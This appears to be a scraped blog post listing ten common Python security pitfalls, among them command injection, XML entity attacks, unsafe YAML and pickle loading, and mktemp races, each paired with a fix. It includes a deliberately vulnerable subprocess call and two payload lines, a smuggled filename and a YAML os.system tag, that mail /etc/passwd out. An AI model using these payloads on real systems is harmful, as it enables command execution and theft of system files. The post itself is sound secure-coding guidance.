visit
Writing secure code is hard. When you learn a language, a module or a framework, you learn how it supposed to be used. When thinking about security, you need to think about how it can be misused. Python is no exception, even within the standard library there are documented bad practices for writing hardened applications. Yet, when I’ve spoken to many Python developers they simply aren’t aware of them.
Here are my top 10, in no particular order, common gotchas in Python applications.
SQL injection is where you’re writing SQL queries directly instead of using an ORM and mixing your string literals with variables. I’ve read plenty of code where “escaping quotes” is deemed a fix. It isn’t. Familiarise yourself with all the complex ways SQL injection can happen with .
Command injection is anytime you’re calling a process using popen, subprocess, os.system and taking arguments from variables. When calling local commands there’s a possibility of someone setting those values to something malicious.
Imagine this simple script . You call a subprocess with the filename as provided by the user:import subprocessdef transcode_file(request, filename): command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename) subprocess.call(command, shell=True) # a bad idea!
The attacker sets the value of filename to "; cat /etc/passwd | mail [email protected]
or something equally dangerous.
For the shell, use the shlex
module to correctly.
If your application ever loads and parses XML files, the odds are you are using one of the XML standard library modules. There are a few common attacks through XML. Mostly DoS-style (designed to crash systems instead of exfiltration of data). Those attacks are common, especially if you’re parsing external (ie non-trusted) XML files.
One of those is called “billion laughs”, because of the payload normally containing a lot (billions) of “lols”. Basically, the idea is that you can do referential entities in XML, so when your unassuming XML parser tries to load this XML file into memory it consumes gigabytes of RAM. Try it out if you don’t believe me :-)
Another attack uses external entity expansion. XML supports referencing entities from external URLs, the XML parser would typically fetch and load that resource without any qualms. “An attacker can circumvent firewalls and gain access to restricted resources as all the requests are made from an internal and trustworthy IP address, not from the outside.”
Another situation to consider is 3rd party packages you’re depending on that decode XML, like configuration files, remote APIs. You might not even be aware that one of your dependencies leaves itself open to these types of attacks. So what happens in Python? Well, the standard library modules, etree, DOM, xmlrpc are all wide open to these types of attacks. It’s well documented
Now, by default Python executes with __debug__
as true, but in a production environment it’s common to run with optimizations. This will skip the assert statement and go straight to the secure code regardless of whether the user is_admin
or not.
Use secrets.compare_digest
, to compare passwords and other private values.
To create temporary files in Python, you’d typically generate a file name using [mktemp()](//docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp")
function and then create a file using this name. “This is not secure, because a different process may create a file with this name in the time between the call to [mktemp()](//docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp")
and the subsequent attempt to create the file by the first process.” This means it could trick your application into either loading the wrong data or exposing other temporary data.
Use the tempfile
mkstemp
if you need to generate temporary files.
“Warning: It is not safe to call
**yaml.load**
with any data received from an untrusted source!**yaml.load**
is as powerful as**pickle.load**
and so may call any Python function.”
This beautiful in the popular Python project Ansible. You could provide Ansible Vault with this value as the (valid) YAML. It calls os.system()
with the arguments provided in the file.
!!python/object/apply:os.system ["cat /etc/passwd | mail [email protected]"]
So, effectively loading YAML files from user-provided values leaves you wide-open to attack.
Demo of this in action, credit Anthony Sottile
Use yaml.safe_load
, pretty much always unless you have a really good reason.
Deserializing pickle data is just as bad as YAML. Python classes can declare a magic-method called __reduce__
which returns a string, or a tuple with a callable and the arguments to call when pickling. The attacker can use that to include references to one of the subprocess modules to run arbitrary commands on the host.
So you’re safe. That is, if you patch your runtime.
, an integer overflow vulnerability that enables code execution. any un-patched version of Ubuntu pre-17.Install the latest version of Python for your production applications, and patch it!
I find the practice of “pinning” versions of Python packages from PyPi in packages terrifying. The idea is that “these are the versions that work” so everyone leaves it alone.
All of the vulnerabilities in code I’ve mentioned above are just as important when they exist in packages that your application uses. Developers of those packages fix security issues. All the time.
It’s called bandit, just pip install bandit
and bandit ./codedir
Credit to RedHat for this that I used in some of my research.